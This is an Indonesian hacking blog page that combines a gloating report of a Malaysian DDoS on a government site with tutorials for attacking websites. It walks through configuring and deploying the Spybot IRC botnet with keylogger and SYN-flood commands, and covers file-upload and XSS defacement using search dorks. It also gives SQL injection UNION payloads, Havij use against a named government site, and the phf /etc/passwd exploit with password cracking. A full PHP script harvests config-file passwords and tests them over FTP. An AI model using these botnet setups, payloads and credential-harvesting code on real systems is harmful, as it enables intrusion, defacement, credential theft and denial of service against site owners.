,
Headlines News :
YogyaXmartcity.com Pendapat wanita jogja mengenai teknologi di bidang telekomunikasi 4G hubungannya dengan kemajuan wanita jogja
Tampilkan postingan dengan label Hack website. Tampilkan semua postingan
Tampilkan postingan dengan label Hack website. Tampilkan semua postingan

Situs Indonesia.go.id di DDOS Hacker Malaysia

http://cirebon-cyber4rt.blogspot.com/2012/06/hacker-malaysia-berencana-men-ddos.html


Situs Indonesia.go.id di DDOS Hacker Malaysia : Setelah banyak hacker Indonesia yang Telah membajak, mendeface,ngeDDOS banyak website malaysia sebagai hujud protes dan kemarahan terhadap tingkah Malingsia yang suka ngeklain Budaya Indonesia yang tercinta ini
Akhir alaiansi hacker dimalingsia bergabung untuk menjatuhkan salah satu website milik pemerintahan INDONESIA

100 hacker mereka kerahkan hanya untuk  menjebol dan mendeface website Indonesia.go.id , sebenarnya rencena ini telah lama kami dengar dan tersebar kemana mana
tapi itu lah malingsia walaupun sudah mengerahkan 100 hacker terbaiknya masih belum dapat mengalahkan 1 Webmaster Indonesia.go.id dan malingsia hanya berhasil nge DDOS website tersebut hahaha

Coba kita pikirkan !! Mereka mengerahkan 100 Hacker terbaiknya hanya untuk menjebol 1 website indonesia dan hasil nya ?? hanya DDos yang bisa mereka lakukan
terus mana kata nya ? yg mereka bilang ingin injeksi dan deface web indonesia tersebut GAGAL kan

Padahal rata rataorang indonesia  yang ngedeface website MALINGsia ada lah per orangan dan satu orang dapat ngedeface dan eksploit lebih dari satu website mereka

Jadi apakah Situs Indonesia.go.id yang di DDOS Hacker Malaysia saya rasa webmaster nya bergetar sedikitpun tidak
hahhahah

Situs Indonesia.go.id di DDOS Hacker Malaysia

Apa itu Ddos dengan spybot


http://usbtips.com/wp-content/uploads/2012/07/spybot.jpg

Serangan yang paling menakutkan sampai detik ini masih tetap di pegang oleh DDoS.
Serangan ini pula yang memaksa gedung putih memindahkan server mereka setelah membuat marah hacker dari c*** dan serangan yang membuat situs microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya serangan tanpa obat seperti ini .

Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak komputer yang siap diperintah.
Komputer komputer ini dinamakan zombie. Hacker akan memerintahkan komputer zombie melalui perantara yang dinamakan sebagai master, disini kita akan menggunakan perantara(master) yaitu mIRC .

ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu masuk ke komputer yang bertindak sebagai MASTER ini. Kemudian memberikan perintah dari situ. Semua komputer zombie yang mendengarkan perintah dari tuannya akan segera melakukan serangan terhadap komputer korban yang di tentukan oleh hacker.


BAGAIMANA MENCARI ZOMBIE ?

Untuk melakukan serangan DDoS, syarat utamanya adalah memiliki pasuka Zombie sebanyak banyaknya. Semakin banyak seseorang memiliki komputer zombie, maka kekuatannya semakin besar dan dengan mudah ia bisa membuat situs manapun yang tidak mempunyai bandwidh yang sebanding dengan nya untuk down. Sebesar apapun bandwidh, pastilah ada batasnya dan ini adalah inti dari serangan DDoS.


ZOMBIE TIDAK HANYA UNTUK DDoS !

Seorang hacker yang memiliki banyak zombie, tidak hanya memanfaatkan pasukannya untuk melakukan serangan DDoS. Hacker bisa melakukan banyak sekali ha-hal yang mengerikan dengan pasukannya, diantaranya adalah :

1. sebagai SPAMMER.
2. Pay Per Click ( PPC ).
3. Pencurian bandwidh dan space.

dan sekarang kita membahas cara membuat nya...


------------------------------------------SPYBOT----------------------------------------


Spybot merupakan salah satu bot yang terkenal di dunia Cyb3R atau Und3R Gr0unD dan sangat luas digunakan oleh para hacker. Bot ini dibuat dengan bahasa C oleh Mich yang sebelumnya disebarkan secara terbatas melalui situs nya .

Karena program ini berupa source code, Anda harus melakukan proses kompilasi yang sering menakutkan pengguna awam. Namun, Anda tidak perlu khawatir, pembuat program ini telah menyediakan sebuah batch file yang tinggal anda klik dana selesailah sudah.

Saya mendownload compiler gratis bahasa C seperti yang disarankan yaitu lcc-win32, program ini saya akan upload. Sangatlah mudah dan tidak ada yang perlu diceritakan lebih lanjut. Anda hanya perlu klik next,next,finish dan selesai.

File sumber SPYBOT terdiri atas file spybot.c yang merupakan source kod file sedangkan konfigurasi disimpan pada file yang berbeda yaitu settings.h . Anda menetukan sifat dan karakterik file spybot yang hendak diciptakan melalui file settings.ini .

Sebagai contoh nya, saya mengambil beberapa baris pntig pada file settings.h

char password[] = "passwordanda"; //bots password
char channel[] = "#channelanda"; //channel bot joins on connect

pada baris password[] merupakan password untuk memerintah bot, tanpa mengetahui password ini, bot akan diam seribu bahasa ketika anda perintahkan melakukan sesuatu.

Secara deffault, password yang digunakan adalah "passwordanda" ....

Secara deffault channel tersebut diset dengan #channelanda .

mIRC mempunyai banyak sekali jaringan-jaringan yang berdiri sendiri. Misalnya, server-server dalam kelompok dalnet, tidak bisa berhubungan dengan server-server dalam kelompok undernet karena keduanya saling berdiri sendiri...

Karena itu, kita juga perlu menentukan server mana channel #channelanda akan dibuat. Baris yang menentukan hal ini berada pada baris berikut :

//servers

char *ircservers[]={
"127.0.0.1",
"irc.icq.com",
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
6667,
6666,

};


Secara deffault server yang akan digunakan dimasukkan kedalam array bernama ircservers yang secara deffault menggunakan 127.0.0.1 dan server irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya dengan server yang digunakan karena menggunakan dua server, terdapat dua port yang digunakan yaitu 6667 dan 6666.

jika anda hendak merubahnya ke server dalnet misalnya, Anda juga harus mengetahui port yang digunakan oleh server tersebut dan mengisinya pada baris serverports[].

Untuk mengetahui nama server dan juga nama port server mIRC, Anda bisa mendownload list server-server mIRC dari internet.
Saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol
Option>Connect>Servers>Pilih Server IRC>Edit.

terlihat server irc.icq.com termasuk dalam kategori group IrCQNet.
Pada contoh ini, Saya tidak akan merubah server yang digunakan dan hanya menghapus server lokal 127.0.0.1 karena memang tidak di perlukan. Code akhir setelah saya edit akan tampak seperti berikut..

char *ircservers[]={
"irc.icq.com",
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
7000,

};


Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan kompilasi.
Klik file "Make spybot.bat" yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban.
anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban..
dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini...

Berikut adalah fungsi menarik yang tersedia :
*ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h


Login password = untuk memerintahkan bot yang diberi password, Anda harus login terlebih dahulu dengan perintah ini

raw [raw command] = Mengirimkan perintah-perintah ke IRC. Anda bisa mempelajari perintah IRC untuk mengetahuinya lebih lanjut (contoh: raw PRIVMSG #spybot1.1:hello)

list [path+filter] = Melihat file, sama dengan perintah dir. (contoh list c:\*.*)

delete [filename] = menghapus file. (contoh : delete c:\windows\netstat.exe)

executa [filename] = Menjalankan file atau program. (contoh : execute c:\windows\system32\notepad.exe). program notepad akan di jalankan di komputer zombie.

rename [originalfile] [newfile] = Merubah nama file (contoh : rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)

makedir [dirname] = Membuat direktory (contoh : makedir c:\test\ )

startkeylogger = menjalankan keylogger di komputer zombie.

stop keylogger = mematikan keylogger di komputer zombie.

sendkeys [keys] = Mensimulasikan ketikan keyboard. Anda bisa mengirimkan ketikan keyboard dengan perintah ini. Sebagai contohnya, jika anda mengirimkan perintah "sendkeys zom-zom" maka tulisan
om-zom akan terkirim.
Saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa menceganya dengan menggunakan spasi di depan karakter yang hendak di kirim

keyboardlights = Menyalakan lampu keyboard sebanyak 50 kali ( tindakan iseng ).

info = memberikan informasi tentang komputer zombie.

listprocesses = melihat proses yang sedang berjalan di komputer zombie.

killprocess [processname] = mematikan proses(contoh : killprocess firefox.exe)

reconnect = memintah komputer zombi untuk disconnect dari server IRC dan melakukan koneksi kembali.

disconnect [sec.] = meminta komputer zombie untuk disconnect dari IRC dalam beberapa waktu tertentu.

quit = mematikan bot

reboot = reboot komputer zombie

cd-rom [0/1] = jika 0 maka akan menutup cd-rom, jika 1 maka akan membuka cd-rom.


httpserver [port] [root-dir] = menjalankan fungsu server web. (contoh : httpserver 80 C:\ ).dengan perintah ini anda bisa mem-browse ke alamat IP zombie dan melihat semua file yang ada di drive C dengan browser.

syn [host] [port] [delat msec.] [times] = melakukan serangan syn (contoh : syn 127.0.0.1 80 100 1000)

Threads = Menampilkan semua proses yang sedang di jalankan oleh bot.

killthread [number] = mematikan proses, number adalah nomor yang di dapatkan pada threads sebelumnya.

get [filename] = mengambil file yang ada di komputer zombie.

opencmd = menjalankan program cmd pada komputer zombie dalam modus tersembunyi..

cmd [command] = mengirim perintah . (sebelumnya harus menggunakan opencmd).

scan [start ip address] [port] [delay] [filename] = melakukan scanning (contoh :
scan 127.0.0.1 17300 1 portscan.txt

download [url] [filename] = mendownload file dari internet. (contoh : download http://127.0.0.0/server.exe c:\server.exe


uninstall = uninstall program bot dari komputer korban. Perintah ini akan membuat program bot tidak aktif lagi di komputer korban namun file bot nya sendiri tidak terhapus.

sudah cukup saya, capek ngetik nya,,,

mudah mudahan bermanfaat ....
--------------------------------------------------------------------------------------

untuk mendownload file" SPYBOT disini
4shared.com 4shared.com/file/205543442/92b83358/Spybot.html

sedangkan untuk mendownload lcc-win32
4shared.com 4shared.com/file/205552015/f37eb4b7/lcc-win32.html

dan bagi yang mau cheat rock legend,,,
4shared.com 4shared.com/file/205542633/11c62602/How_to_cheat_rock_legend.html

Cara Deface Website Dengan Teknik Web KindEditor

Cara Deface Website Dengan Teknik Web KindEdit
http://cirebon-cyber4rt.blogspot.com/2012/04/cara-deface-website-dengan-teknik-web.html

Malem hari ini saya akan share tutorial Cara Deface Website Dengan Teknik Web KindEditor. Bagi yang suka maen empes-empesan, Ane punya tutorial deface yang ngga terlalu sulit nih, anak SD juga kayanya bisa wkwk :p

Ok, Langsung aja kita mulai defacenya ^^

Masukan Dorknya ke kotak pencarian Google :
  • inurl:examples/uploadbutton.html
  • inurl:kindeditor
Exploit :
  • http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html
1. Kalo web target udah dapet, kita klik upload,


2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML ane... Cireboncyber4rt.html


3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL.


4. Kemudian kalo sudah, tekan Enter.
5. Taraaa... :D

Gimana, mudahkan? hehehe... Bagi agan-agan yang masih bingung, silahkan bisa pakai demo upload buttonnya yang sudah saya dapatkan dibawah ini :
Semoga tutorial diatas tentang Cara Deface Website Dengan Teknik Web KindEditor bisa bermanfaat bagi agan-agan sekalian, kurang lebihnya saya mohon maaf, Wassalam.

Update : Bagi agan-agan yang butuh kode HTML Defacenya, saya sudah sediakan Klik Disini. Kalian hanya perlu mengeditnya kembali dengan menggunakan Notepad++or :

Deface dengan Teknik Remote File Upload Exploit Vulnerability

Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.


http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html
We Are Anonymous !

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

2). Pilih salah satu website sebagai target.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

3). Tampilan Webitenya nanti akan seperti ini.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

8). Lalu klik Send it to the Server.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

http://tysk.ee/failid/Image/fortuner-suf-terbaik.html

Cara Deface Website Menggunakan Teknik XSS Vulnerability

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :


inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by MR ZzZ</h1></marquee>

4). Kemudian tekan Enter.

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Cara Hacking Website Dengan Menggunakan Tools Havij 1.15

Cara Hacking Website Dengan Menggunakan Tools Havij 1.15 : ok sebenar nya sudah banyak yang menulis tentang Cara Hacking Website Dengan Menggunakan Tools Havij 1.15 ini bahkan saya juga sudak menuliskan Cara Hacking Website Dengan Menggunakan Tools Havij dalam versi bersi lama nya tetapi sekarang akan saya ulas kembali yang versi 1.15

Cara Hacking Website Dengan Menggunakan Tools Havij 1.15

Download Tools :Dowload disini
Installation Setup
  • Download Tools Havijnya dari Mediafire
  • Lalu Extract Filenya
  • Kemudian Double Klik Icon Havijnya
  • Selesai.
1). Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.


2). Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google, Banyak kok :D

3). Jika target sudah dapat, saya ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054

4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.


5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.


6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.


7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.


8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.


9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.

Nah bagaimana sob? lebih mudah atau lebih sulit dengan cara yang pernah saya post sebelumnya, kalo menurut saya cara ini adalah cara terpraktis, termurah dan paling gampang kalo kita mau meretas sebuah website

Hack website




1. IIS 4.0 IIshack Vulnerabillity
    dapat ditemukan di http://www.technotronic.com

2. Active Server Pages (ASP) Vulnerabillity
    1. (ASP DOT Bug Vulnerabillity) (kesalahan titik pada setiap akhir
         .ASP)
         di lihat di http://oliver.efri.hr/~crv/security/bugs/NT/asp.html
         vulnerabillity-nya dapat di ketahui dengan penambahan titik (.) pada setiap akhir asp

         misal, http://192.168.51.101/code/example.asp.

        namun dalam perkembangannya diperbaiki oleh Microsoft USA, dan menimbulkan lagi  Vulnerabillity baru yaitu:

          http://192.168.51.101/code/example%2easp

          jadi menambahkan %2e (tanpa titik/disambung) dengan asp

     2. ASP Alternate Data Streams Vulnerabillity
         penambahan titik pada file.asp, yaitu

         http://192.168.51.101/scripts/file.asp

         menjadi

         http://192.168.51.101/scripts/file.asp::$DATA

(sumber, Hacking Exposed)
Cara mendapatkan shell gratis tanpa beli.

perlu beberapa bahan yaitu:
1. Web browser (minimal 3.0)
2. Program cracker (gunakan crackerjack atau starcracker)
3. daftar kata (wordlist/dictionary) - GlobalKOS KOSdict - 11.2 MB
4. KOmputer umum

step:
1. buka 2 window
2. window yang 1, dipakai untuk membuka www.altavista.com/sk,
dengan keywordnya, host:ac.il) jika menginginkan host2 dari israel,
host:co.jp, jika menginginkan yang dari jepang. trus liat hasilnya
3. window yang ke 2, digunakan untuk mencari pasw dari host2 yang didapat
pada window 1, caranya dengan memasukan :
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

misalnya

http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

4. hasilnya kemungkinan ada 4.
1. error..message...(kalo udah ginian, maka harus kembali lagi ke awal...)
2. smile, you're on candid camera...( artinya, nomor ip kita direkam, dan disimpan diserver si target)
3. muncul tulisan: root:*0:0:SystemAdministrator:/:/bin/cshsysadm:*:1:1:BokephMemendez:/usr/adm:/bin/bash.

perhatikan bahwa setelah tanda titik dua yang pertama, selalu muncul tanda asteriks (*). ini artinya
kamu berhasil mendapatkan password hanya saja sayangnya sang fil sudah dishadow...harus ada
akses ROOT, terpaksa harus ke target berikutnya...

4. muncul tulisan: root:OUK9b8RqMRVNs:0:0:root,,,,:/:/bin/cshsysadm:*:0:0:system V administration:/usr/
admin:/bin/shdiag:*:0:996: HardwareDiagnostics:/usr/diags:/bin/csh Leonid:F5AymuqmXVFCU:1399:8:Leonid
Bebek:/usr/leonid:/bin/tcsh
(dalam kasus ini: langsung bisa dapat file passwd asli! tanpa shadow!!!)

5. segera setelahn menndapat file Passwd didapatkan, "save as" dan simpan
ditempat yang aman, terserah boleh kalo mau lanjut ke target berikut atau segra
mengcrack. patikan kom,puter untuk ngecrack aman dan bisa dibiarkan menganggur
selama berjam-jam atau kalo file passwdnya memang besar, bisa berhari-hari.
6. jalankan program crack, gunakan wordlist atas file passwd yang baru dipanen
7. kalo sudah berhasil ngecrack, kamu sudah siap untuk memakai shell unix baru.
8. telnet ke servernya, jangan lupa....gunakan komp umum, kalo pribadi....di phreak dulu.

(sumber, Anonymous)

FTP Hack Buat Dapetin Cpanel by heykhend

Code:
<?php
echo “<html>”;
echo “<title>@h!_u!_ | HACKCENTER</title><body>”;
set_time_limit(0);
##################
@$passwd=fopen(‘/etc/passwd’,’r’);
if (!$passwd) {
echo “[-] Error : coudn’t read /etc/passwd”;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,”:”);
$username=substr($str,0,$pos);
$dirz=”/home/$username/public_html/”;
if (($username!=””)) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
#########################
echo “<br><br>”;
echo “<textarea name=’main_window’ cols=100 rows=20>”;
echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;
echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;
echo “[~] Searching for passwords in config.* files…\n\n”;
foreach ($users as $user) {
$path=”/home/$user/public_html/”;
read_dir($path,$user);
}
echo “\n[+] Done\n”;
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath=”$path$file”;
if (($file!=’.’) and ($file!=’..’)) {
if (is_readable($fpath)) {
$dr=”$fpath/”;
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’db_connect.php’)) {
$pass=get_pass($fpath);
if ($pass!=”) {
echo “[+] $fpath\n$pass\n”;
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=fopen($link,’r’);
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {
if (strrpos($line,’”‘))
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,’”‘)-(strpos($line,’=’)+3)));
else
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));
return $pass;
}
}
}
function ftp_check($login,$pass) {
@$ftp=ftp_connect(’127.0.0.1?);
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;
}
else ftp_quit($ftp);
}
}
echo “</textarea><br>”;
echo “</body></html>”;
?>

cara mencari kelemahan website / situs

Cara mencari kelemahan website/situs
Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.
Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.

WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL InjectionCross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatisXPath injection tool, dan Cross Site Scripting tool!
Apa itu WebCruiser?, WebCruiser adalah alat untuk:

  • SQL Injection Tool pertama untuk Windows 7, Windows Vista
  • Web Vulnerability Scanner
  • SQL Injection Scanner
  • Cross Site Scripting Scanner
  • XPath Injection Scanner
  • Automatic SQL Injection Tool (POC)
  • Cross Site Scripting Tool (POC)
  • XPath Injection Tool (POC)
  • Post Data Resend Tool
Fitur Webcruiser:
  • Crawler(Site Directori dan File)
  • Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
  • SQL Injection Scanner
  • SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
  • SQL Injection for SQL Server: PlainText/Union/Blind Injection
  • SQL Injection for MySQL: PlainText/Union/Blind Injection
  • SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
  • SQL Injection for DB2: Union/Blind Injection
  • SQL Injection for Access: Union/Blind Injection
  • Post Data Resend
  • Cross Site Scripting Scanner and POC
  • XPath Injection Scanner and POC
  • Auto Get Cookie From Web Browser For Authentication
  • Report Output.
Download WebCruiser Web Vulnerability Scanner Enterprise v2.5.0

cara hacking website dengan metode teknik sql injection By heykhend

 
 
 
 
 
 
2 Votes
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya pelajari dari forum dari http://heykhend.indonesianforum.net oleh seorang penulis sebut saja heykhend
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

DDoS Via CMD

ni gan dia cara nya ddos via cmd jadi silakan baca yang benar ya

Artikel ini menjelaskan metode yang digunakan untuk meluncurkan DDoS (Distributed Denial of Service Attack) pada mesin seperti server atau router. Ini adalah masalah umum karena serangan diluncurkan menggunakan mesin dikompromikan, biasanya tanpa persetujuan dari pemiliknya.
serangan DDoS menjadi lebih umum, sebagian karena sistem operasi Microsoft Windows dan kebanyakan atas lubang keamanan. Sebuah DDoS atau DoS adalah serangan diluncurkan pada sasaran tertentu untuk menolak layanan internet-nya. Tidak ada perbedaan antara DoS dan DDoS kecuali bahwa DDoS menggunakan berbagai sumber. Hacker sering menyerang sebuah situs atau server menggunakan DDoS untuk membawanya “offline.” Serangan ini adalah ilegal!Aku tahu beberapa administrator jaringan yang telah berurusan dengan DDoS sebelum dan dalam kebanyakan kasus itu hanya menjengkelkan. Meskipun jenis serangan tidak menghancurkan data atau membahayakan secara fisik setiap peralatan, mereka dapat menyebabkan peningkatan bandwidth. Tergantung pada kesepakatan dari mesin target ISP, ini bisa berarti uang besar. Jaringan administrator menghabiskan berjam-jam di telepon dengan ISP berhenti DDoS. Kadang-kadang korban serangan DDoS melakukan sesuatu untuk memicu serangan. Sebuah serangan DDoS besar yang melibatkan lebih dari 10.000 mesin diluncurkan melawan SCO, perusahaan saat ini menuntut IBM, untuk 1 miliar dolar selama sengketa yang melibatkan kode sumber Linux. Namun, beberapa serangan DDoS besar pertama diluncurkan melawan. Com keberhasilan seperti Ebay, Amazon, dan Yahoo pada pertengahan 2000.
Bagaimana Mesin adalah dikompromikan …
